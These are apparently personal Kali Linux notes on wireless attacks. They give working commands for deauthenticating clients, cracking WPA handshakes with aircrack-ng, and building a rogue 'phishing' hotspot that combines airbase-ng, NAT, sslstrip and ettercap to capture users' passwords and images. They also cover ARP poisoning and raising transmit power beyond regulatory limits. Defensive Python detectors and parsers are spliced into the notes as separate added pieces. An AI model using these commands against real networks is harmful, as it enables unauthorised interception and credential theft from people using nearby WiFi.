kali---aircrack-ng


1. Download and install aircrack-ng

    a. Install directly from the repositories

        apt-get install aircrack-ng

    b. Download, compile and install

        Download aircrack-ng-1.1.tar.gz (http://download.aircrack-ng.org/aircrack-ng-1.1.tar.gz)

        Extract the archive, change into the extracted directory, run make on the Makefile, then install with make Makefile install

        You may need openssl installed for the build to succeed.

        Use the command

        apt-get install libssl-dev

        to install openssl


2. Bring up the wireless interface, open a terminal and run ifconfig -a to check that wlan is up; if it is, go on to the next step. This also shows the local machine's MAC address.



3. Find the target network and enable monitoring. Open terminal 1.

    a. Use the command

      iwlist wlan0 scanning


      On some wireless cards this command no longer works after monitoring on wlan0mon has been stopped at the end; the card then has to be restarted. The card used in this test behaves this way.


      Then find the chosen network and note its MAC address, channel, ESSID and so on.

      Use the command

      airmon-ng start wlan0

      to start a monitor interface



4. Open terminal 1


ifconfig

airodump-ng wlan0mon

ioctl(SIOCSIFFLAGS) failed: Operation not possible due to RF-kill


rfkill list

rfkill unblock 2


    b. Use the command

      airmon-ng start wlan0


      airodump-ng wlan0mon


airodump-ng wlan0mon

airodump-ng wlan0mon --bssid D8:5D:4C:32:CB:A6

airodump-ng wlan0mon -c 6

airodump-ng wlan0mon --encrypt WPA2

airodump-ng wlan0mon --encrypt OPN

airodump-ng wlan0mon --essid 607

airodump-ng wlan0mon --essid 606-ztg

airodump-ng wlan0 --essid 606-ztg


airodump-ng -w longas wlan0mon --essid aidajingjing


      The addresses of the wireless networks now appear on the screen.


      The screen shows their MAC addresses and channels.

      Pick the network you want and note its channel and MAC address.



4. Open terminal 2

    Use the command


    airodump-ng -c <channel> --bssid <target MAC> -w name wlan0mon


airodump-ng -c 10 --bssid C8:3A:35:14:AB:18 -w name wlan0mon

airodump-ng -c 10 --bssid 14:75:90:8B:BE:4E -w name wlan0mon


00:23:6C:97:21:89

00:26:C7:72:B2:3C

F0:27:65:6B:09:97

A8:A6:68:1A:D8:1D


    Here name is the prefix of the capture file and can be changed.




5. Open terminal 3

    Use the command


    aireplay-ng -1 0 -a <target MAC> -h <local MAC> wlan0mon


aireplay-ng -1 0 -a C8:3A:35:14:AB:18 -h C8:AA:21:DF:0D:6D wlan0mon


    A success message should appear. If none appears, the target may not support this or the system is unstable, and a different target is needed.

    Once it reports success, proceed to the next step.


    Next enter the command

    aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b <target MAC> -h <local MAC> wlan0mon


aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b C8:3A:35:14:AB:18 -h C8:AA:21:DF:0D:6D wlan0mon


    The data count in terminal 2 now grows quickly; once it reaches 5000 that is enough.


root@debian:~# aireplay-ng -0 1 -a C8:3A:35:14:AB:18 -c C8:AA:21:DF:0D:6D wlan0mon




7. Open terminal 4

    Use the command (the capture prefix here is longas)

aircrack-ng name*.cap


aircrack-ng -w /root/桌面/aircrack-ng-dictionary/all.lst longas*.cap


    name is the prefix you chose yourself



8. Finally

    In one terminal enter the command

    airmon-ng stop wlan0mon


    to end monitoring

    (airmon-ng check shows how many monitor sessions you have started; when running several at once you can check and then choose which to stop)


++++++++++++++++++++++++++ Using Aircrack-ng: WPA/WPA2-PSK encrypted wireless networks ++++++++++++++++++++++++++++++++++

 CH  1 ][ Elapsed: 4 mins ][ 2015-09-07 07:53                                         


 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 C8:3A:35:14:AB:18   -3      748      154    0  10  54e  WPA  CCMP   PSK  606-ztg


 BSSID              STATION            PWR   Rate    Lost    Frames  Probe

 C8:3A:35:14:AB:18  C8:AA:21:DF:0D:6D  -25    1e- 1e     0      156
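Added example, not part of the original notes: a Python parser for the airodump-ng screen table shown above. It reads the access-point and station tables into records and runs two checks a defender would want on any such scan: which networks are open or WEP, and whether one ESSID is advertised by more than one BSSID, which is the signature of the kind of rogue hotspot that airbase-ng sets up later in these notes. The sample text is the table from the notes plus two rows I constructed (an open network and a second BSSID with the same ESSID). The AUTH values PSK/MGT/OPN/SKA are the ones airodump-ng prints; station rows whose BSSID column reads "(not associated)" are skipped.

```python
# Added example, not from the original notes: parse the airodump-ng screen
# table into records and run basic defensive checks on it.
import re
from collections import defaultdict

# Constructed sample: the table from the notes plus two made-up rows
# (an open network and a second BSSID advertising the same ESSID).
SAMPLE = """\
 CH  1 ][ Elapsed: 4 mins ][ 2015-09-07 07:53

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 C8:3A:35:14:AB:18   -3      748      154    0  10  54e  WPA  CCMP   PSK  606-ztg
 AA:BB:CC:00:00:01  -40       12        0    0   6  54e  OPN              guest-wifi
 AA:BB:CC:00:00:02  -60       33        2    0  11  54e  WPA2 CCMP   PSK  606-ztg

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe

 C8:3A:35:14:AB:18  C8:AA:21:DF:0D:6D  -25    1e- 1e     0      156
 AA:BB:CC:00:00:02  DE:AD:BE:EF:00:01  -55    1e- 1e     0       40  606-ztg
"""

MAC = r"(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}"
STATION_ROW = re.compile(
    rf"^\s*(?P<bssid>{MAC})\s+(?P<station>{MAC})\s+(?P<pwr>-?\d+)\s+"
    r"(?P<rate>\S+\s*-\s*\S+)\s+(?P<lost>\d+)\s+(?P<frames>\d+)\s*(?P<probe>.*?)\s*$"
)
AUTH_VALUES = {"PSK", "MGT", "OPN", "SKA"}   # values airodump-ng prints in the AUTH column


def parse_ap_row(tokens):
    bssid, pwr, beacons, data, _per_sec, ch, _mb, enc = tokens[:8]
    rest = tokens[8:]
    if enc == "OPN":                     # open network: CIPHER and AUTH are blank
        cipher, auth, essid = "", "", rest
    else:
        cipher = rest[0] if rest else ""
        if len(rest) > 1 and rest[1] in AUTH_VALUES:
            auth, essid = rest[1], rest[2:]
        else:                            # e.g. WEP with an empty AUTH column
            auth, essid = "", rest[1:]
    return {"bssid": bssid, "pwr": int(pwr), "beacons": int(beacons),
            "data": int(data), "channel": int(ch), "enc": enc,
            "cipher": cipher, "auth": auth, "essid": " ".join(essid)}


def parse_airodump(text):
    """Return (access_points, stations) from airodump-ng's on-screen tables."""
    aps, stations, section = [], [], None
    for line in text.splitlines():
        tokens = line.split()
        if not tokens:
            continue
        if tokens[:2] == ["BSSID", "PWR"]:
            section = "ap"
        elif tokens[:2] == ["BSSID", "STATION"]:
            section = "station"
        elif section == "ap" and re.fullmatch(MAC, tokens[0]) and len(tokens) >= 8:
            aps.append(parse_ap_row(tokens))
        elif section == "station":
            m = STATION_ROW.match(line)   # "(not associated)" rows do not match and are skipped
            if m:
                row = m.groupdict()
                for key in ("pwr", "lost", "frames"):
                    row[key] = int(row[key])
                stations.append(row)
    return aps, stations


def weak_networks(aps):
    """BSSIDs with no or broken link-layer encryption."""
    return [ap["bssid"] for ap in aps if ap["enc"] in ("OPN", "WEP")]


def duplicate_essids(aps):
    """ESSIDs seen from more than one BSSID: a possible evil twin, to be verified by hand."""
    by_essid = defaultdict(set)
    for ap in aps:
        if ap["essid"]:
            by_essid[ap["essid"]].add(ap["bssid"])
    return {essid: sorted(b) for essid, b in by_essid.items() if len(b) > 1}


def stations_for(stations, bssid):
    return [s["station"] for s in stations if s["bssid"] == bssid]


if __name__ == "__main__":
    aps, stations = parse_airodump(SAMPLE)
    print("weak:", weak_networks(aps))
    print("duplicate ESSIDs:", duplicate_essids(aps))
    for ap in aps:
        print(ap["bssid"], ap["essid"], ap["enc"], stations_for(stations, ap["bssid"]))
```

A second BSSID on the same ESSID is also what a legitimate multi-AP deployment looks like, so the duplicate check is a lead to confirm against the known inventory (vendor OUI, channel, signal), not a verdict on its own. For anything longer than a screen, the CSV that `-w name` writes is the better input.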





Open terminal 1

ifconfig -a

airmon-ng start wlan0

airodump-ng wlan0mon

ioctl(SIOCSIFFLAGS) failed: Operation not possible due to RF-kill


rfkill list

rfkill unblock 2


airodump-ng -w name wlan0mon

airodump-ng -w name wlan0mon --essid 606-ztg


Open terminal 2

airodump-ng -c 10 --bssid C8:3A:35:14:AB:18 -w log wlan0mon


Open terminal 3

aireplay-ng -0 1 -a C8:3A:35:14:AB:18 -c C8:AA:21:DF:0D:6D wlan0mon


Open terminal 4

aircrack-ng -w /root/桌面/aircrack-ng-dictionary/all.lst log*.cap
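Added example, not from the original notes: the detection side of the `aireplay-ng -0` step in terminal 3 above. A wireless IDS sees that step as a burst of 802.11 deauthentication frames carrying the AP's BSSID, so the code below decodes raw management frames (24-byte header, no radiotap, no FCS) and reports any BSSID whose deauth count reaches a threshold. The capture is constructed in memory using the BSSID and station MAC from the notes' airodump-ng output; on a real system the frames would come from a monitor-mode pcap.

```python
# Added example, not from the original notes: parse raw 802.11 management
# frames and flag a burst of deauthentication frames per BSSID.
import struct
from collections import Counter

MGMT = 0                     # frame type 0 = management
DISASSOC, DEAUTH = 10, 12    # management subtypes
AP = "C8:3A:35:14:AB:18"     # BSSID from the notes' airodump-ng output
STA = "C8:AA:21:DF:0D:6D"    # station from the notes' airodump-ng output
BROADCAST = "ff:ff:ff:ff:ff:ff"


def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def make_test_frame(subtype, dst, src, bssid, body=b""):
    """Build an in-memory management frame (24-byte header + body, no FCS)
    for the constructed sample capture below; nothing is transmitted."""
    fc = (MGMT << 2) | (subtype << 4)   # version 0, type and subtype live in the low byte
    header = struct.pack("<HH6s6s6sH", fc, 0,
                         mac_bytes(dst), mac_bytes(src), mac_bytes(bssid), 0)
    return header + body


def parse_frame(frame):
    """Decode type/subtype and the three addresses; reason code for deauth/disassoc."""
    if len(frame) < 24:
        return None
    fc, _dur, a1, a2, a3, _seq = struct.unpack("<HH6s6s6sH", frame[:24])
    info = {"type": (fc >> 2) & 0x3, "subtype": (fc >> 4) & 0xF,
            "addr1": mac_str(a1), "addr2": mac_str(a2), "addr3": mac_str(a3)}
    if info["type"] == MGMT and info["subtype"] in (DEAUTH, DISASSOC) and len(frame) >= 26:
        info["reason"] = struct.unpack("<H", frame[24:26])[0]
    return info


def deauth_report(frames, threshold):
    """BSSIDs whose deauth count reaches threshold (isolated deauths are normal AP housekeeping)."""
    counts = Counter()
    for frame in frames:
        p = parse_frame(frame)
        if p and p["type"] == MGMT and p["subtype"] == DEAUTH:
            counts[p["addr3"]] += 1      # addr3 is the BSSID in management frames
    return {bssid: n for bssid, n in counts.items() if n >= threshold}


def sample_capture():
    """Constructed capture: one beacon, 64 deauths to the station, one disassociation."""
    frames = [make_test_frame(8, BROADCAST, AP, AP, b"\x00" * 12)]
    frames += [make_test_frame(DEAUTH, STA, AP, AP, struct.pack("<H", 7)) for _ in range(64)]
    frames.append(make_test_frame(DISASSOC, STA, AP, AP, struct.pack("<H", 8)))
    return frames


if __name__ == "__main__":
    print(deauth_report(sample_capture(), threshold=10))
```

The count is per capture rather than per time window; a production detector would bucket by timestamp, and would also treat deauths whose source address is not the real AP's MAC as a separate, stronger signal.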



++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


ifconfig

airodump-ng wlan0mon

ioctl(SIOCSIFFLAGS) failed: Operation not possible due to RF-kill


rfkill list

rfkill block 2

rfkill unblock 2


airmon-ng start wlan0

airmon-ng stop wlan0



airodump-ng wlan0mon

airodump-ng wlan0mon --bssid D8:5D:4C:32:CB:A6

airodump-ng wlan0mon -c 6

airodump-ng wlan0mon --encrypt WPA2

airodump-ng wlan0mon --encrypt OPN

airodump-ng wlan0mon --essid 607


airodump-ng -w longas wlan0mon --essid aidajingjing



+++++++++++++++++++++++ 7.5 Example: creating a phishing WiFi hotspot in Kali Linux +++++++++++++++++++++++++++++++++++++


ifconfig -a

airmon-ng start wlan0          #put the card into monitor mode

airodump-ng wlan0mon

ioctl(SIOCSIFFLAGS) failed: Operation not possible due to RF-kill


rfkill list

rfkill unblock 2

airbase-ng -c 12 -e ztg wlan0mon



root@debian:~# iw wlan0mon del

root@debian:~# iw wlan0 del

root@debian:~# iw phy phy0 interface add wlan0 type monitor



+++++++++++++++++++++++ Hands-on WiFi phishing test with Kali +++++++++++++++++++++++++++++++++++++

http://www.freebuf.com/articles/wireless/69840.html


route -n -A inet | grep UG


0.0.0.0         10.108.160.1    0.0.0.0         UG    1024   0        0 eth0

10.3.9.31       10.108.160.1    255.255.255.255 UGH   1      0        0 eth0


gatewayip = 10.108.160.1

internet_interface = eth0

fakeap_interface = wlan0

ESSID = aaaa



-------Terminal window 1


ifconfig -a


ifconfig wlan0 down

iwconfig wlan0 mode monitor

ifconfig wlan0 up


SIOCSIFFLAGS: Operation not possible due to RF-kill


rfkill list


0: phy0: Wireless LAN

    Soft blocked: yes

    Hard blocked: no

1: tpacpi_bluetooth_sw: Bluetooth

    Soft blocked: no

    Hard blocked: no

2: hci0: Bluetooth

    Soft blocked: no

    Hard blocked: no


rfkill unblock 1
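Added example, not from the original notes: a small parser for the `rfkill list` output shown above, so the index handed to `rfkill unblock` is read from the listing instead of typed from memory. The notes use index 2 in one place and index 1 in another because the numbering depends on the machine, and in the listing above the soft-blocked Wireless LAN entry is actually index 0. The sample is the notes' own output, embedded as a string; the functions distinguish a soft block (clearable with rfkill) from a hard block (a physical switch or firmware setting that rfkill cannot clear).

```python
# Added example, not from the original notes: find the rfkill index of the
# soft-blocked Wireless LAN device from `rfkill list` output.
import re

# Constructed sample: the `rfkill list` output recorded in the notes.
RFKILL_SAMPLE = """\
0: phy0: Wireless LAN
    Soft blocked: yes
    Hard blocked: no
1: tpacpi_bluetooth_sw: Bluetooth
    Soft blocked: no
    Hard blocked: no
2: hci0: Bluetooth
    Soft blocked: no
    Hard blocked: no
"""

DEVICE_HEADER = re.compile(r"^(\d+):\s*([^:]+):\s*(.+?)\s*$")


def parse_rfkill(text):
    """Return one dict per device: index, name, type, soft, hard."""
    devices = []
    for line in text.splitlines():
        m = DEVICE_HEADER.match(line)
        if m:
            devices.append({"index": int(m.group(1)), "name": m.group(2).strip(),
                            "type": m.group(3), "soft": None, "hard": None})
            continue
        if not devices:
            continue                      # attribute line before any device header
        field = line.strip().lower()
        if field.startswith("soft blocked:"):
            devices[-1]["soft"] = field.endswith("yes")
        elif field.startswith("hard blocked:"):
            devices[-1]["hard"] = field.endswith("yes")
    return devices


def wlan_unblock_indices(devices):
    """Indices to pass to `rfkill unblock` for soft-blocked Wireless LAN devices."""
    return [d["index"] for d in devices if d["type"] == "Wireless LAN" and d["soft"]]


def hard_blocked_wlan(devices):
    """Wireless LAN devices blocked by a switch or firmware; rfkill unblock will not help."""
    return [d["index"] for d in devices if d["type"] == "Wireless LAN" and d["hard"]]


if __name__ == "__main__":
    devs = parse_rfkill(RFKILL_SAMPLE)
    for idx in wlan_unblock_indices(devs):
        print(f"rfkill unblock {idx}")
    if hard_blocked_wlan(devs):
        print("hard-blocked WLAN present; check the hardware switch")
```

On a live host, feed it `subprocess.run(["rfkill", "list"], capture_output=True, text=True).stdout`; newer rfkill releases also offer a JSON output mode that avoids parsing text at all.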

ifconfig wlan0 up

airmon-ng start wlan0

root@debian:~# airbase-ng -e ztg wlan0



airbase-ng wlan0 -e ztg -c 10





airbase-ng wlan0mon -e ztg -c 10


iw wlan0 del; iw wlan0mon del; iw phy phy0 interface add wlan0 type monitor;


iw wlan0 del; iw phy phy0 interface add wlan0 type monitor; ifconfig wlan0 up; ifconfig wlan0 mtu 1400; airmon-ng start wlan0; airbase-ng wlan0 -e ztg -c 10


ifconfig wlan0 down; ifconfig wlan0 up; ifconfig wlan0 mtu 1400; airbase-ng wlan0 -e ztg -c 10

-------


//airmon-ng start wlan0

//airbase-ng -c 12 -e ztg wlan0



-------Terminal window 2

root@debian:~# ifconfig at0 up; ifconfig at0 192.168.1.1 netmask 255.255.255.0; ifconfig at0 mtu 1420; ifconfig wlan0 mtu 1460; route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1; echo 1 > /proc/sys/net/ipv4/ip_forward; iptables -F; iptables -X; iptables -Z; iptables -t nat -F; iptables -t nat -X; iptables -t nat -Z; iptables -t mangle -F; iptables -t mangle -X; iptables -t mangle -Z; iptables -P INPUT ACCEPT; iptables -P OUTPUT ACCEPT; iptables -P FORWARD ACCEPT; iptables -t nat -P PREROUTING ACCEPT; iptables -t nat -P OUTPUT ACCEPT; iptables -t nat -P POSTROUTING ACCEPT; iptables -t nat -A POSTROUTING -s 192.168.1.0/24 -o eth0 -j MASQUERADE;


root@debian:~# ifconfig at0 up; ifconfig at0 192.168.1.1 netmask 255.255.255.0; route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1; echo 1 > /proc/sys/net/ipv4/ip_forward; iptables -F; iptables -X; iptables -Z; iptables -t nat -F; iptables -t nat -X; iptables -t nat -Z; iptables -t mangle -F; iptables -t mangle -X; iptables -t mangle -Z; iptables -P INPUT ACCEPT; iptables -P OUTPUT ACCEPT; iptables -P FORWARD ACCEPT; iptables -t nat -P PREROUTING ACCEPT; iptables -t nat -P OUTPUT ACCEPT; iptables -t nat -P POSTROUTING ACCEPT; iptables -t nat -A POSTROUTING -s 192.168.1.0/24 -o eth0 -j MASQUERADE;


-------


# Tables


ifconfig at0 up

ifconfig at0 192.168.1.1 netmask 255.255.255.0

ifconfig at0 mtu 1420

ifconfig wlan0 mtu 1460

route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1

echo 1 > /proc/sys/net/ipv4/ip_forward

iptables -F

iptables -X

iptables -Z

iptables -t nat -F

iptables -t nat -X

iptables -t nat -Z

iptables -t mangle -F

iptables -t mangle -X

iptables -t mangle -Z

iptables -P INPUT ACCEPT

iptables -P OUTPUT ACCEPT

iptables -P FORWARD ACCEPT

iptables -t nat -P PREROUTING ACCEPT

iptables -t nat -P OUTPUT ACCEPT

iptables -t nat -P POSTROUTING ACCEPT

iptables -t nat -A POSTROUTING -s 192.168.1.0/24 -o eth0 -j MASQUERADE


//iptables -A FORWARD -i eth0 -o at0 -m state --state ESTABLISHED,RELATED -j ACCEPT

//iptables -A FORWARD -i at0 -o eth0 -j ACCEPT

//iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

//iptables -t nat -A POSTROUTING -s 192.168.1.0/24 -o eth0 -j MASQUERADE

//iptables -t nat -A POSTROUTING -s 192.168.1.0/24 -o eth0 -j SNAT --to-source 10.108.160.1

//iptables -t nat -A PREROUTING -i at0 -j DNAT --to-source 10.108.160.1
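Added example, not from the original notes: an audit of the gateway configuration that the rules above build, viewed from the host-hardening side. It parses an `iptables-save` dump together with the ip_forward sysctl and reports the three things that make a box forward and rewrite other people's traffic: ip_forward enabled, MASQUERADE/SNAT on an uplink, and PREROUTING REDIRECT rules that quietly divert a port to a local listener (the `--to-port 10000` rule later in these notes shows up in iptables-save as `--to-ports 10000`). The dump is constructed to mirror the notes' rules; `read_ip_forward` reads the real sysctl on a Linux host and returns None elsewhere.

```python
# Added example, not from the original notes: audit iptables-save output and
# ip_forward for NAT-gateway and transparent-redirect configuration.
import re

# Constructed sample in iptables-save format, mirroring the rules in the notes.
IPTABLES_SAVE_SAMPLE = """\
*nat
:PREROUTING ACCEPT [0:0]
:INPUT ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
:POSTROUTING ACCEPT [0:0]
-A PREROUTING -p tcp -m tcp --dport 80 -j REDIRECT --to-ports 10000
-A POSTROUTING -s 192.168.1.0/24 -o eth0 -j MASQUERADE
COMMIT
*filter
:INPUT ACCEPT [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
COMMIT
"""

REDIRECT_RULE = re.compile(r"^-A PREROUTING .*--dport (\d+) .*-j REDIRECT --to-ports (\d+)")


def parse_iptables_save(text):
    """Return {table: {"policies": {chain: policy}, "rules": [rule, ...]}}."""
    tables, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("*"):                      # table header, e.g. *nat
            current = line[1:]
            tables[current] = {"policies": {}, "rules": []}
        elif line.startswith(":") and current:        # chain policy line
            chain, policy = line[1:].split()[:2]
            tables[current]["policies"][chain] = policy
        elif line.startswith("-A") and current:       # appended rule
            tables[current]["rules"].append(line)
        elif line == "COMMIT":
            current = None
    return tables


def read_ip_forward(path="/proc/sys/net/ipv4/ip_forward"):
    """Return the sysctl value on a Linux host, or None where the file does not exist."""
    try:
        with open(path) as f:
            return int(f.read().strip())
    except (OSError, ValueError):
        return None


def audit_gateway(tables, ip_forward):
    """List the findings that make this host a NAT gateway or a transparent redirector."""
    findings = []
    if ip_forward == 1:
        findings.append("ip_forward=1: host forwards packets between interfaces")
    for rule in tables.get("nat", {"rules": []})["rules"]:
        if "-j MASQUERADE" in rule or "-j SNAT" in rule:
            findings.append("source NAT on uplink: " + rule)
        m = REDIRECT_RULE.match(rule)
        if m:
            findings.append(f"transparent redirect: tcp/{m.group(1)} -> local port {m.group(2)}")
    if tables.get("filter", {"policies": {}})["policies"].get("FORWARD") == "ACCEPT":
        findings.append("FORWARD policy ACCEPT: every forwarded packet is allowed by default")
    return findings


if __name__ == "__main__":
    tables = parse_iptables_save(IPTABLES_SAVE_SAMPLE)
    for finding in audit_gateway(tables, read_ip_forward()):
        print(finding)
```

On a host that is meant to be an end system rather than a router, any non-empty result from `audit_gateway` is worth a ticket; on a deliberate gateway the interesting findings are the REDIRECT rules, since those are what a transparent interception proxy needs.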



-------Terminal window 3

root@debian:~# /etc/init.d/isc-dhcp-server stop; dhcpd -d -f -cf /etc/dhcp/dhcpd.conf at0

-------


# DHCP


#dhcpd -d -f -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0

dhcpd -d -f -cf /etc/dhcp/dhcpd.conf at0

dhcpd -cf /etc/dhcp/dhcpd.conf at0

dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0

/etc/init.d/isc-dhcp-server restart

/etc/init.d/isc-dhcp-server start

/etc/init.d/isc-dhcp-server stop



dhcpd -d -f -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0; /etc/init.d/isc-dhcp-server restart;



-------Terminal window 4

root@debian:~# driftnet -i at0

-------



-------Terminal window 4

root@debian:~# sslstrip -f -p -k 10000

-------


-------Terminal window 5

root@debian:~# ettercap -p -u -T -q -w /pentest/wireless/airssl/passwords -i at0

-------


-------Terminal window 6

root@debian:~# mkdir -p "/pentest/wireless/airssl/driftnetdata"

root@debian:~# driftnet -i eth0 -p -d /pentest/wireless/airssl/driftnetdata

-------




export PATH=$PATH:/mnt/opt/android-on-linux/android-sdk-linux/platform-tools/




iwconfig wlan0 txpower 15

iw dev wlan0 set txpower fixed 30


iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE #source NAT on eth0

iptables -A FORWARD -i wlan1 -o eth0 -j ACCEPT #forward wireless traffic to the wired card (or whichever card has internet access)

iptables -A FORWARD -p tcp --syn -s 192.168.1.0/24 -j TCPMSS --set-mss 1356 #change the maximum segment size


iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1

iptables -P FORWARD ACCEPT

iptables --append FORWARD --in-interface at0 -j ACCEPT

iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000


iwconfig wlan0 mode monitor

ifconfig wlan0 up

airmon-ng start wlan0

iw phy0 info

iw wlan0 info


root@debian:~# cat /etc/NetworkManager/system-connections/


++++++++++++++Setting transmit power

iw list

ifconfig wlan0 down

iw reg set BO

iwconfig wlan0 channel 13

iwconfig wlan0 txpower 30

ifconfig wlan0 up


+++++++++++++++++++


ettercap -T -q -M ARP //192.168.0.1/ //192.168.0.101/

ettercap -T -q -M ARP //192.168.0.1/ //192.168.0.101/

ettercap -T -M arp:remote //192.168.0.1/ //192.168.1.101/
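Added example, not from the original notes or from ettercap: the detection side of the `-M ARP` commands above. ARP poisoning works by sending replies that bind a victim's IP (the gateway 192.168.0.1 and the host 192.168.0.101 in the commands) to the attacker's MAC, so a detector keeps its own IP-to-MAC table and alerts when an IP's MAC changes or when one MAC starts claiming several IPs. The reply records below are constructed; on a live host they would be taken from a packet capture on the LAN interface, and the optional trusted map would be seeded with the gateway's real MAC from inventory.

```python
# Added example, not from the original notes: alert on ARP replies that
# rebind an IP to a new MAC or let one MAC claim several IPs.
from collections import defaultdict


class ArpSpoofDetector:
    def __init__(self, trusted=None):
        # trusted: optional static IP -> MAC map (e.g. the gateway) to seed the table
        self.table = {ip: mac.lower() for ip, mac in (trusted or {}).items()}
        self.ips_by_mac = defaultdict(set)
        for ip, mac in self.table.items():
            self.ips_by_mac[mac].add(ip)
        self.alerts = []

    def observe(self, ip, mac, ts):
        """Record one ARP reply (sender IP/MAC) and return the alerts it raised."""
        mac = mac.lower()
        raised = []
        known = self.table.get(ip)
        if known is not None and known != mac:
            raised.append({"ts": ts, "kind": "mac-changed", "ip": ip,
                           "old": known, "new": mac})
        self.table[ip] = mac
        first_time = ip not in self.ips_by_mac[mac]
        self.ips_by_mac[mac].add(ip)
        if first_time and len(self.ips_by_mac[mac]) > 1:
            raised.append({"ts": ts, "kind": "mac-claims-multiple-ips", "mac": mac,
                           "ips": sorted(self.ips_by_mac[mac])})
        self.alerts.extend(raised)
        return raised


# Constructed sample traffic: (timestamp, sender IP, sender MAC) from ARP replies.
SAMPLE_REPLIES = [
    (1.0, "192.168.0.1",   "aa:aa:aa:aa:aa:01"),   # real gateway
    (1.5, "192.168.0.101", "bb:bb:bb:bb:bb:65"),   # ordinary host
    (2.0, "192.168.0.1",   "cc:cc:cc:cc:cc:ee"),   # third MAC now claims the gateway IP
    (2.1, "192.168.0.101", "cc:cc:cc:cc:cc:ee"),   # ... and the host's IP as well
]


def run_detector(replies, trusted=None):
    det = ArpSpoofDetector(trusted)
    for ts, ip, mac in replies:
        det.observe(ip, mac, ts)
    return det.alerts


if __name__ == "__main__":
    for alert in run_detector(SAMPLE_REPLIES, trusted={"192.168.0.1": "aa:aa:aa:aa:aa:01"}):
        print(alert)
```

A MAC change alone is also what a replaced NIC or a VRRP failover looks like, so the stronger indicator is the second one: a single MAC answering for both the gateway and a host, which is exactly the bidirectional poisoning the `arp:remote` variant sets up. Static ARP entries for the gateway and Dynamic ARP Inspection on managed switches are the usual mitigations.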


++++++++++++++++++


root@debian:~# lspci -tv

-[0000:00]-+-00.0  Intel Corporation Xeon E3-1200 v3/4th Gen Core Processor DRAM Controller

           +-01.0-[01]----00.0  NVIDIA Corporation GF117M [GeForce 610M/710M/820M / GT 620M/625M/630M/720M]

           +-02.0  Intel Corporation 4th Gen Core Processor Integrated Graphics Controller

           +-03.0  Intel Corporation Xeon E3-1200 v3/4th Gen Core Processor HD Audio Controller

           +-14.0  Intel Corporation 8 Series/C220 Series Chipset Family USB xHCI

           +-16.0  Intel Corporation 8 Series/C220 Series Chipset Family MEI Controller #1

           +-1a.0  Intel Corporation 8 Series/C220 Series Chipset Family USB EHCI #2

           +-1b.0  Intel Corporation 8 Series/C220 Series Chipset High Definition Audio Controller

           +-1c.0-[02-06]--

           +-1c.1-[07]----00.0  Realtek Semiconductor Co., Ltd. RTL8723BE PCIe Wireless Network Adapter

           +-1c.2-[08-0c]--

           +-1c.3-[0d]----00.0  Realtek Semiconductor Co., Ltd. RTL8111/8168/8411 PCI Express Gigabit Ethernet Controller

           +-1c.4-[0e-12]----00.0  Realtek Semiconductor Co., Ltd. RTS5227 PCI Express Card Reader

           +-1d.0  Intel Corporation 8 Series/C220 Series Chipset Family USB EHCI #1

           +-1f.0  Intel Corporation HM86 Express LPC Controller

           +-1f.2  Intel Corporation 8 Series/C220 Series Chipset Family 6-port SATA Controller 1 [AHCI mode]

           \-1f.3  Intel Corporation 8 Series/C220 Series Chipset Family SMBus Controller

root@debian:~#


root@debian:~# lspci -vnn

07:00.0 Network controller [0280]: Realtek Semiconductor Co., Ltd. RTL8723BE PCIe Wireless Network Adapter [10ec:b723]

    Subsystem: Lenovo Device [17aa:b728]

    Flags: bus master, fast devsel, latency 0, IRQ 17

    I/O ports at 6000 [size=256]

    Memory at f5d00000 (64-bit, non-prefetchable) [size=16K]

    Capabilities: [40] Power Management version 3

    Capabilities: [50] MSI: Enable- Count=1/1 Maskable- 64bit+

    Capabilities: [70] Express Endpoint, MSI 00

    Capabilities: [100] Advanced Error Reporting

    Capabilities: [140] Device Serial Number 00-23-b7-fe-ff-4c-e0-00

    Capabilities: [150] Latency Tolerance Reporting

    Capabilities: [158] L1 PM Substates

    Kernel driver in use: rtl8723be